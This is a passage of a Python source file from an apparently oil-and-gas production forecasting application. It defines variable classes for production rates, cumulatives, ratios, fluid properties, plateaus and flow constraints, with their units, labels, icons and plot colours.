def __init__(self, unit_system=None):
super().__init__()
self._unit = TimeUnit()
self._menu_label = 'Time'
self._plot_label = 'Time'
self._image = ico.time_16x16
self._limits = (0., None)
self._id = 'time'
class Date(DurationVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = DateUnit()
self._menu_label = 'Date'
self._plot_label = 'Dates'
self._image = ico.dates_16x16
self._limits = (None, None)
self._is_date = True
self._id = 'date'
# ======================================================================================================================
# Production Potential Variables
# ======================================================================================================================
class PotentialVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._type = 'potentials'
self._type_id = ID_POTENTIAL
class OilPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Oil production potential'
self._image = ico.oil_rate_16x16
self._line_options = LineOptions(label=r'Oil Pot.', colour=np.array([0., 176., 80.]) / 255., linestyle='--')
self._plot_label = r'Oil Production Potential'
self._id = 'oil_potential'
class GasPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Gas production potential'
self._image = ico.gas_rate_16x16
self._line_options = LineOptions(label=r'Gas Pot.', colour=np.array([255., 0., 0.]) / 255., linestyle='--')
self._plot_label = r'Gas Production Potential'
self._id = 'gas_potential'
class WaterPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Water production potential'
self._image = ico.water_rate_16x16
self._line_options = LineOptions(label=r'Water Pot.', colour=np.array([91., 155., 213.]) / 255., linestyle='--')
self._plot_label = r'Water Production Potential'
self._id = 'water_potential'
class LiquidPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Liquid production potential'
self._image = ico.liquid_rate_16x16
self._line_options = LineOptions(label=r'Liquid Pot.', colour=np.array([51., 102., 153.]) / 255., linestyle='--')
self._fitted_options = FittedDataOptions(colour=np.array([255., 0., 0.]) / 255.)
self._plot_label = r'Liquid Production Potential'
self._id = 'liquid_potential'
class LiftGasPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Lift gas injection potential'
self._image = ico.lift_gas_rate_16x16
self._line_options = LineOptions(label=r'Lift Gas Pot.', colour=np.array([219., 34., 211.]) / 255., linestyle='--')
self._plot_label = r'Lift Gas Injection Potential'
self._id = 'lift_gas_potential'
class GasInjectionPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Gas injection potential'
self._image = ico.gas_injection_rate_16x16
self._line_options = LineOptions(label=r'Gas Inj. Pot.', colour=np.array([255., 0., 0.]) / 255., linestyle='--')
self._plot_label = r'Gas Injection Potential'
self._id = 'gas_injection_potential'
class WaterInjectionPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Water injection potential'
self._image = ico.water_injection_rate_16x16
self._line_options = LineOptions(label=r'Water Inj. Pot.', colour=np.array([91., 155., 213.]) / 255., linestyle='--')
self._plot_label = r'Water Injection Potential'
self._id = 'water_injection_potential'
class TotalGasPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Total gas production potential'
self._image = ico.total_gas_rate_16x16
self._line_options = LineOptions(label=r'Total Gas Pot.', colour=np.array([218., 119., 6.]) / 255., linestyle='--')
self._plot_label = r'Total Gas Production Potential'
self._id = 'total_gas_potential'
# ======================================================================================================================
# Production Rate Variables
# ======================================================================================================================
class RateVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._type = 'rates'
self._type_id = ID_RATE
class OilRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Oil production rate'
self._image = ico.oil_rate_16x16
self._line_options = LineOptions(label=r'Oil Rate', colour=np.array([0., 176., 80.]) / 255.)
self._plot_label = r'Oil Production Rate'
self._id = 'oil_rate'
class GasRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Gas production rate'
self._image = ico.gas_rate_16x16
self._line_options = LineOptions(label=r'Gas Rate', colour=np.array([255., 0., 0.]) / 255.)
self._plot_label = r'Gas Production Rate'
self._id = 'gas_rate'
class WaterRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Water production rate'
self._image = ico.water_rate_16x16
self._line_options = LineOptions(label=r'Water Rate', colour=np.array([91., 155., 213.]) / 255.)
self._plot_label = r'Water Production Rate'
self._id = 'water_rate'
class LiquidRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Liquid production rate'
self._image = ico.liquid_rate_16x16
self._line_options = LineOptions(label=r'Liquid Rate', colour=np.array([51., 102., 153.]) / 255.)
self._plot_label = r'Liquid Production Rate'
self._id = 'liquid_rate'
class LiftGasRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Lift gas injection rate'
self._image = ico.lift_gas_rate_16x16
self._line_options = LineOptions(label=r'Lift Gas Rate', colour=np.array([219., 34., 211.]) / 255.)
self._plot_label = r'Lift Gas Injection Rate'
self._id = 'lift_gas_rate'
class GasInjectionRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Gas injection rate'
self._image = ico.gas_injection_rate_16x16
self._line_options = LineOptions(label=r'Gas Inj. Rate', colour=np.array([255., 0., 0.]) / 255.)
self._plot_label = r'Gas Injection Rate'
self._id = 'gas_injection_rate'
class WaterInjectionRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Water injection rate'
self._image = ico.water_injection_rate_16x16
self._line_options = LineOptions(label=r'Water Inj. Rate', colour=np.array([91., 155., 213.]) / 255.)
self._plot_label = r'Water Injection Rate'
self._id = 'water_injection_rate'
class TotalGasRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Total gas production rate'
self._image = ico.total_gas_rate_16x16
self._line_options = LineOptions(label=r'Total Gas Rate', colour=np.array([218., 119., 6.]) / 255.)
self._plot_label = r'Total Gas Production Rate'
self._id = 'total_gas_rate'
# ======================================================================================================================
# Cumulative Production Variables
# ======================================================================================================================
class CumulativeVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._type = 'cumulatives'
self._type_id = ID_CUMULATIVE
class OilCumulative(CumulativeVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeUnit(unit_system)
self._menu_label = 'Cumulative oil production'
self._image = ico.oil_cum_16x16
self._line_options = LineOptions(label=r'Oil Cum.', colour=np.array([0., 134., 61.]) / 255.)
self._plot_label = r'Cumulative Oil Production'
self._id = 'oil_cumulative'
class GasCumulative(CumulativeVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasVolumeUnit(unit_system)
self._menu_label = 'Cumulative gas production'
self._image = ico.gas_cum_16x16
self._line_options = LineOptions(label=r'Gas Cum.', colour=np.array([192., 0., 0.]) / 255.)
self._plot_label = r'Cumulative Gas Production'
self._id = 'gas_cumulative'
class WaterCumulative(CumulativeVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeUnit(unit_system)
self._menu_label = 'Cumulative water production'
self._image = ico.water_cum_16x16
self._line_options = LineOptions(label=r'Water Cum.', colour=np.array([51., 126., 195.]) / 255.)
self._plot_label = r'Cumulative Water Production'
self._id = 'water_cumulative'
class LiquidCumulative(CumulativeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = LiquidVolumeUnit(unit_system)
self._menu_label = 'Cumulative liquid production'
self._image = ico.liquid_cum_16x16
self._line_options = LineOptions(label=r'Liquid Cum.', colour=np.array([51., 63., 79.]) / 255.)
self._plot_label = r'Cumulative Liquid Production'
self._id = 'liquid_cumulative'
class LiftGasCumulative(CumulativeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = GasVolumeUnit(unit_system)
self._menu_label = 'Cumulative lift gas injection'
self._image = ico.lift_gas_cum_16x16
self._line_options = LineOptions(label=r'Lift Gas Cum.', colour=np.array([153., 0., 153.]) / 255.)
self._plot_label = r'Cumulative Lift Gas Injection'
self._id = 'lift_gas_cumulative'
class GasInjectionCumulative(CumulativeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = GasVolumeUnit(unit_system)
self._menu_label = 'Cumulative gas injection'
self._image = ico.gas_injection_cum_16x16
self._line_options = LineOptions(label=r'Gas Inj. Cum.', colour=np.array([192., 0., 0.]) / 255.)
self._plot_label = r'Cumulative Gas Injection'
self._id = 'gas_injection_cumulative'
class WaterInjectionCumulative(CumulativeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = LiquidVolumeUnit(unit_system)
self._menu_label = 'Cumulative Water injection'
self._image = ico.water_injection_cum_16x16
self._line_options = LineOptions(label=r'Water Inj. Cum.', colour=np.array([51., 126., 195.]) / 255.)
self._plot_label = r'Cumulative Water Injection'
self._id = 'water_injection_cumulative'
class TotalGasCumulative(CumulativeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = GasVolumeUnit(unit_system)
self._menu_label = 'Cumulative total gas production'
self._image = ico.total_gas_cum_16x16
self._line_options = LineOptions(label=r'Total Gas Cum.', colour=np.array([218., 119., 6.]) / 255.)
self._plot_label = r'Cumulative Total Gas Production'
self._id = 'total_gas_cumulative'
# ======================================================================================================================
# Ratio Variables
# ======================================================================================================================
class FractionVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., 1.)
self._type = 'ratios'
self._type_id = ID_RATIO
class RatioVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._type = 'ratios'
self._type_id = ID_RATIO
class WaterCut(FractionVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidLiquidRatioUnit(unit_system)
self._menu_label = 'Water-cut'
self._image = ico.water_cut_16x16
self._line_options = LineOptions(label=r'Water-cut', colour=np.array([91., 155., 213.]) / 255.)
self._fitted_options = FittedDataOptions(colour=np.array([217., 83., 25.]) / 255.) # TODO: NOT USED
self._plot_label = r'Water-cut'
self._id = 'water_cut'
class OilCut(FractionVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidLiquidRatioUnit(unit_system)
self._menu_label = 'Oil-cut'
self._image = ico.oil_cut_16x16
self._line_options = LineOptions(label=r'Oil-cut', colour=np.array([0., 176., 80.]) / 255.)
self._fitted_options = FittedDataOptions(colour=np.array([255., 0., 0.]) / 255.)
self._plot_label = r'Oil-cut'
self._id = 'oil_cut'
class GasOilRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasLiquidRatioUnit(unit_system)
self._menu_label = 'Gas-oil ratio'
self._image = ico.gas_oil_ratio_16x16
self._line_options = LineOptions(label=r'GOR', colour=np.array([255., 0., 0.]) / 255.)
self._fitted_options = FittedDataOptions(colour=np.array([122., 48., 160.]) / 255.)
self._plot_label = r'Gas-Oil Ratio'
self._id = 'gas_oil_ratio'
class WaterOilRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidLiquidRatioUnit(unit_system)
self._menu_label = 'Water-oil ratio'
self._image = ico.water_oil_ratio_16x16
self._line_options = LineOptions(label=r'WOR', colour=np.array([91., 155., 213.]) / 255.)
self._plot_label = r'Water-Oil Ratio'
self._id = 'water_oil_ratio'
class GasLiquidRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasLiquidRatioUnit(unit_system)
self._menu_label = 'Gas-liquid ratio'
self._image = ico.gas_liquid_ratio_16x16
self._line_options = LineOptions(label=r'GLR', colour=np.array([255., 0., 0.]) / 255.)
self._plot_label = r'Gas-Liquid Ratio'
self._id = 'gas_liquid_ratio'
class WaterGasRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidGasRatioUnit(unit_system)
self._menu_label = 'Water-gas ratio'
self._image = ico.water_gas_ratio_16x16
self._line_options = LineOptions(label=r'WGR', colour=np.array([91., 155., 213.]) / 255.)
self._plot_label = r'Water-Gas Ratio'
self._id = 'water_gas_ratio'
class OilGasRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidGasRatioUnit(unit_system)
self._menu_label = 'Oil-gas ratio'
self._image = ico.oil_gas_ratio_16x16
self._line_options = LineOptions(label=r'WGR', colour=np.array([0., 176., 80.]) / 255.)
self._plot_label = r'Oil-Gas Ratio'
self._id = 'oil_gas_ratio'
class TotalGasLiquidRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasLiquidRatioUnit(unit_system)
self._menu_label = 'Total gas-liquid ratio'
self._image = ico.total_gas_liquid_ratio_16x16
self._line_options = LineOptions(label=r'TGLR', colour=np.array([218., 119., 6.]) / 255.)
self._plot_label = r'Total Gas-Liquid Ratio'
self._id = 'total_gas_liquid_ratio'
# ======================================================================================================================
# Uptime Variables
# ======================================================================================================================
class UptimeVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., 1.)
self._type = 'uptimes'
self._type_id = ID_UPTIME
class ProductionUptime(UptimeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = FractionUnit()
self._menu_label = 'Production uptime'
self._image = ico.uptime_16x16
self._line_options = LineOptions(label=r'Prod. uptime', colour=np.array([255., 217., 102.]) / 255.)
self._plot_label = r'Production Uptime'
self._id = 'production_uptime'
class LiftGasUptime(UptimeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = FractionUnit()
self._menu_label = 'Lift gas uptime'
self._image = ico.uptime_16x16
self._line_options = LineOptions(label=r'Lift gas uptime', colour=np.array([255., 217., 102.]) / 255.)
self._plot_label = r'Lift Gas Uptime'
self._id = 'lift_gas_uptime'
class GasInjectionUptime(UptimeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = FractionUnit()
self._menu_label = 'Gas inj. uptime'
self._image = ico.uptime_16x16
self._line_options = LineOptions(label=r'Gas inj. uptime', colour=np.array([255., 217., 102.]) / 255.)
self._plot_label = r'Gas Injection Uptime'
self._id = 'gas_injection_uptime'
class WaterInjectionUptime(UptimeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = FractionUnit()
self._menu_label = 'Water inj. uptime'
self._image = ico.uptime_16x16
self._line_options = LineOptions(label=r'Water inj. uptime', colour=np.array([255., 217., 102.]) / 255.)
self._plot_label = r'Water Injection Uptime'
self._id = 'water_injection_uptime'
# ======================================================================================================================
# Summary variables (for use on frames)
# ======================================================================================================================
class SummaryFunction(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Function'
self._choices = ('Point', 'Sum', 'Average')
self._choice_images = (ico.specific_point_16x16, ico.specific_point_16x16, ico.specific_point_16x16)
self._pytype = tuple
self._tooltip = 'Function that reduces a temporal production profile to a scalar.'
class SummaryPoint(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Point'
self._choices = ('First', 'Last', 'Date', 'Time')
self._choice_images = (ico.first_point_16x16, ico.last_point_16x16, ico.dates_16x16, ico.time_16x16)
self._pytype = tuple
self._tooltip = 'The specific summary point of the production profile.'
class SummaryPointDate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Date'
self._pytype = date
self._tooltip = 'Date at which to extract summary point.'
class SummaryPointTime(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = 'years'
self._frame_label = 'Time'
self._pytype = float
self._tooltip = 'Time at which to extract summary point.'
class SummaryIcon(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Icon'
self._choices = ('Oil rate', 'Gas rate', 'Water rate', 'Liquid rate', 'Lift gas rate', 'Gas injection rate',
'Water injection rate', 'Total gas rate', 'Oil cumulative', 'Gas cumulative',
'Water cumulative', 'Liquid cumulative', 'Lift gas cumulative', 'Gas injection cumulative',
'Water injection cumulative', 'Total gas cumulative', 'Length', 'HCFT', 'HCPV', 'Permeability')
self._choice_images = (ico.oil_rate_16x16, ico.gas_rate_16x16, ico.water_rate_16x16,
ico.liquid_rate_16x16, ico.lift_gas_rate_16x16, ico.gas_injection_rate_16x16,
ico.water_injection_rate_16x16, ico.total_gas_rate_16x16,
ico.oil_cum_16x16, ico.gas_cum_16x16, ico.water_cum_16x16,
ico.liquid_cum_16x16, ico.lift_gas_cum_16x16, ico.gas_injection_cum_16x16,
ico.water_injection_cum_16x16, ico.total_gas_cum_16x16,
ico.completion_16x16, ico.HCFT_16x16, ico.HCPV_16x16, ico.permeability_16x16)
self._client_data_map = {i: bitmap for i, bitmap in enumerate(self._choice_images)}
self._pytype = tuple
class HistogramFrequency(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = AmountUnit()
self._plot_label = 'Frequency'
self._legend = 'Frequency'
self._limits = (0., None)
# ======================================================================================================================
# Concession Variables
# ======================================================================================================================
class License(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'License'
self._pytype = date
self._type = 'concessions'
self._id = 'license'
# ======================================================================================================================
# Plateau Variables
# ======================================================================================================================
class PlateauVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 1
self._pytype = float
self._type = 'plateaus'
class TargetOilPlateau(PlateauVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Target oil'
self._menu_label = 'Target oil plateau'
self._image = ico.well_spacing_16x16
self._plot_label = r'Target Oil Plateau'
self._legend = r'Oil Plateau'
self._tooltip = 'Target oil plateau used as constraint in prediction.'
self._id = 'target_oil_plateau'
class TargetGasPlateau(PlateauVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._frame_label = 'Target gas'
self._menu_label = 'Target gas plateau'
self._image = ico.well_spacing_16x16
self._plot_label = r'Target Gas Plateau'
self._legend = r'Gas Plateau'
self._tooltip = 'Target gas plateau used as constraint in prediction.'
self._id = 'target_gas_plateau'
# ======================================================================================================================
# Well Variables
# ======================================================================================================================
class ProductionPhase(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Primary phase'
self._choices = ('Oil', 'Gas')
self._pytype = Index
class InjectionPhase(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Injected phase'
self._choices = ('Water', 'Gas', 'WAG')
self._pytype = Index
class DevelopmentLayout(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Layout'
self._image = ico.well_pair_2_16x16
self._choices = (None, 'Line-drive', 'Radial', '5-spot')
self._choice_images = (None, ico.well_pair_2_16x16, ico.radial_pattern_16x16, ico.five_spot_16x16)
self._tooltip = 'Scaling of well spacing is only done on\n' \
'wells/analogues with similar development scheme.'
self._pytype = tuple
class WellSpacing(Variable):
def __init__(self, unit_system):
super().__init__()
self._unit = LengthUnit(unit_system)
self._frame_label = 'Spacing'
self._menu_label = 'Well spacing'
self._image = ico.well_spacing_16x16
self._limits = (0., None)
self._plot_label = r'Well Spacing'
self._legend = r'Spacing'
self._tooltip = 'Used to scale the rate and cumulative production\n' \
'based on the ratio between the spacing of the\n' \
'producer and an analogue.'
self._pytype = int
self._type = 'well_spacing'
self._id = 'spacing'
class History(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Import'
self._pytype = tuple
self._tooltip = 'Profile of historical data:\n' \
'- Browse: Import profile from external file.'
class HistoryFit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Import'
self._pytype = tuple
self._tooltip = 'Profile of historical data:\n' \
'- Browse: Import profile from external file\n' \
'- Window: Fit models to historical data for use in prediction.'
class Cultural(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Import'
self._pytype = tuple
self._tooltip = 'Cultural of the entity:\n' \
'- Field, Block, Reservoir, Theme, Polygon: 2D outline (x, y)\n' \
'- Pipeline: 2D trajectory (x, y)\n' \
'- Platform, Processor: Point (x, y)\n' \
'- Producer, Injector, Analogue: 3D trajectory (x, y, z)'
class Prediction(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Prediction'
self._choices = ('Low', 'Mid', 'High')
self._choice_images = (ico.low_chart_16x16, ico.mid_chart_16x16, ico.high_chart_16x16)
self._pytype = tuple
class ProbabilityOfOccurrence(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = PercentageUnit()
self._frame_label = 'Occurrence'
self._limits = (0., 100.)
self._round_off = 1
self._pytype = float
self._tooltip = 'Probability of the currently selected prediction\n' \
'to be sampled during uncertainty modelling'
# ======================================================================================================================
# Pointer Variables
# ======================================================================================================================
class Analogue(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Analogue'
self._pytype = Pointer
self._tooltip = 'Analogue from which to historical data:\n' \
'- Arrow: Insert Analogue from menu\n' \
'- Window: Create function based on models\n' \
' fitted to historical data.'
class Typecurve(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Typecurve'
self._pytype = Pointer
self._tooltip = 'Profile used for prediction:\n' \
'- Arrow: Insert Typecurve from menu\n' \
'- Browse: Import profile from external file\n' \
'- Window: Create function based on models\n' \
' fitted to historical data.'
class Scaling(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Scaling'
self._pytype = Pointer
self._tooltip = 'Scaling evaluation used for transforming\n' \
'static parameters to scalers:\n' \
'- Arrow: Insert Scaling from menu.'
class Scenario(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Scenario'
self._pytype = Pointer
self._tooltip = 'Scenario from which to gather entities, events and dates:\n' \
'- Arrow: Insert Scenario from menu.'
class HistorySimulation(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'History'
self._pytype = Pointer
self._tooltip = 'History simulation to carry into prediction:\n' \
'- Arrow: Insert History from menu.'
# ======================================================================================================================
# Fluid Variables
# ======================================================================================================================
class FluidVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 2
self._pytype = float
class ReservoirFluidVariable(FluidVariable):
def __init__(self):
super().__init__()
self._type = 'res_fluids'
class InjectionFluidVariable(FluidVariable):
def __init__(self):
super().__init__()
self._type = 'inj_fluids'
class OilFVF(ReservoirFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeRatio(unit_system)
self._frame_label = 'Bo'
self._menu_label = 'Oil FVF'
self._image = ico.Bo_16x16
self._plot_label = r'Oil FVF, $b_o$'
self._legend = r'$b_o$'
self._tooltip = 'Oil formation volume factor.'
self._id = 'bo'
class GasFVF(ReservoirFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasVolumeRatio(unit_system)
self._frame_label = 'Bg'
self._menu_label = 'Gas FVF'
self._image = ico.Bg_16x16
self._plot_label = r'Gas FVF, $b_g$'
self._legend = r'$b_g$'
self._tooltip = 'Gas formation volume factor.'
self._id = 'bg'
class WaterFVF(ReservoirFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeRatio(unit_system)
self._frame_label = 'Bw'
self._menu_label = 'Water FVF'
self._image = ico.Bw_16x16
self._plot_label = r'Water FVF, $b_w$'
self._legend = r'$b_w$'
self._tooltip = 'Water formation volume factor.'
self._id = 'bw'
class SolutionGasOilRatio(ReservoirFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasLiquidRatioUnit(unit_system)
self._frame_label = 'Rs'
self._menu_label = 'Solution GOR'
self._image = ico.Rs_16x16
self._plot_label = r'Solution Gas-Oil Ratio, $R_s$'
self._legend = r'$R_s$'
self._tooltip = 'Solution gas-oil-ratio.'
self._id = 'rs'
class InjectionGasFVF(InjectionFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasVolumeRatio(unit_system)
self._frame_label = 'Bg inj.'
self._menu_label = 'Gas inj. FVF'
self._image = ico.Bg_inj_16x16
self._plot_label = r'Injection Gas FVF, $b_{g,inj}$'
self._legend = r'$b_{g,inj}$'
self._tooltip = 'Injection gas formation volume factor.'
self._id = 'bg_inj'
class InjectionWaterFVF(InjectionFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeRatio(unit_system)
self._frame_label = 'Bw inj.'
self._menu_label = 'Water inj. FVF'
self._image = ico.Bw_inj_16x16
self._plot_label = r'Injection Water FVF, $b_{w,inj}$'
self._legend = r'$b_{w,inj}$'
self._tooltip = 'Injection water formation volume factor.'
self._id = 'bw_inj'
# ======================================================================================================================
# Stakes Variables
# ======================================================================================================================
class Maturity(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Maturity'
self._menu_label = 'Maturity'
self._image = ico.oil_cum_16x16 # TODO: Draw icon
self._limits = (.5, 1.5)
self._plot_label = r'Maturity'
self._legend = r'Maturity'
self._round_off = 2
self._pytype = float
self._tooltip = 'Maturity index between 0.5 to 1.5,\n' \
'low values indicate low maturity and vice versa.'
self._type = 'risking'
self._id = 'maturity'
class ProbabilityOfSuccess(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = PercentageUnit()
self._frame_label = 'PoS'
self._menu_label = 'Probability of success'
self._image = ico.binary_distribution_16x16
self._limits = (0., 100.)
self._plot_label = r'Probability of Success, PoS'
self._legend = r'PoS'
self._round_off = 2
self._pytype = float
self._tooltip = 'Probability of Success is used to include or\n' \
'exclude a well during uncertainty modelling.\n' \
'Weighted average shown for subsurface items.'
self._type = 'risking'
self._id = 'pos'
class STOIIP(Variable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeUnit(unit_system)
self._frame_label = 'STOIIP'
self._menu_label = 'STOIIP'
self._image = ico.stoiip_16x16
self._limits = (0., None)
self._plot_label = r'STOIIP'
self._legend = r'STOIIP'
self._pytype = int
self._tooltip = 'Stock tank oil initially in place.'
self._type = 'volumes'
self._id = 'stoiip'
# ======================================================================================================================
# Constraint Variables
# ======================================================================================================================
class ConstraintVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 2
self._pytype = float
self._type = 'constraints'
class OilConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Oil flow'
self._menu_label = 'Oil flow con.'
self._image = ico.oil_flow_constraint_16x16
self._plot_label = r'Oil Flow Constraint, $Q_{o,max}$'
self._legend = r'Oil Con.'
self._tooltip = 'Oil flow constraint.'
self._id = 'oil_constraint'
class GasConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._frame_label = 'Gas flow'
self._menu_label = 'Gas flow con.'
self._image = ico.gas_flow_constraint_16x16
self._plot_label = r'Gas Flow Constraint, $Q_{g,max}$'
self._legend = r'Gas Con.'
self._tooltip = 'Gas flow constraint.'
self._id = 'gas_constraint'
class WaterConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Water flow'
self._menu_label = 'Water flow con.'
self._image = ico.water_flow_constraint_16x16
self._plot_label = r'Water Flow Constraint, $Q_{w,max}$'
self._legend = r'Water Con.'
self._tooltip = 'Water flow constraint.'
self._id = 'water_constraint'
class LiquidConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Liquid flow'
self._menu_label = 'liquid flow con.'
self._image = ico.liquid_flow_constraint_16x16
self._plot_label = r'Liquid Flow Constraint, $Q_{l,max}$'
self._legend = r'Liquid Con.'
self._tooltip = 'Liquid flow constraint.'
self._id = 'liquid_constraint'
class InjectionGasConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._frame_label = 'Gas-inj. rate'
self._menu_label = 'Gas-inj. con.'
self._image = ico.gas_injection_constraint_16x16
self._plot_label = r'Gas-Injection Constraint, $Q_{g,inj,max}$'
self._legend = r'Gas-Inj. Con.'
self._tooltip = 'Injection gas constraint.'
self._id = 'gas_inj_constraint'
class InjectionWaterConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Water-inj. rate'
self._menu_label = 'Water-inj. con.'
self._image = ico.water_injection_constraint_16x16
self._plot_label = r'Water-Injection Constraint, $Q_{w,inj,max}$'
self._legend = r'Water-Inj. Con.'
self._tooltip = 'Injection water constraint.'
self._id = 'water_inj_constraint'
class LiftGasConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._frame_label = 'Gas-lift rate'
self._menu_label = 'Gas-lift con.'
self._image = ico.lift_gas_constraint_16x16
self._plot_label = r'Gas-Lift Constraint, $Q_{g,lift,max}$'
self._legend = r'Gas-Lift Con.'
self._tooltip = 'Lift-gas constraint.'
self._id = 'lift_gas_constraint'
# ======================================================================================================================
# Out-flowing Phase Variables
# ======================================================================================================================
class OilInflow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Oil'
self._pytype = bool
self._tooltip = 'Oil is fed in from the previous node.'
class GasInflow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Gas'
self._pytype = bool
self._tooltip = 'Gas is fed in from the previous node.\n' \
'This is the total gas, i.e. gas from\n' \
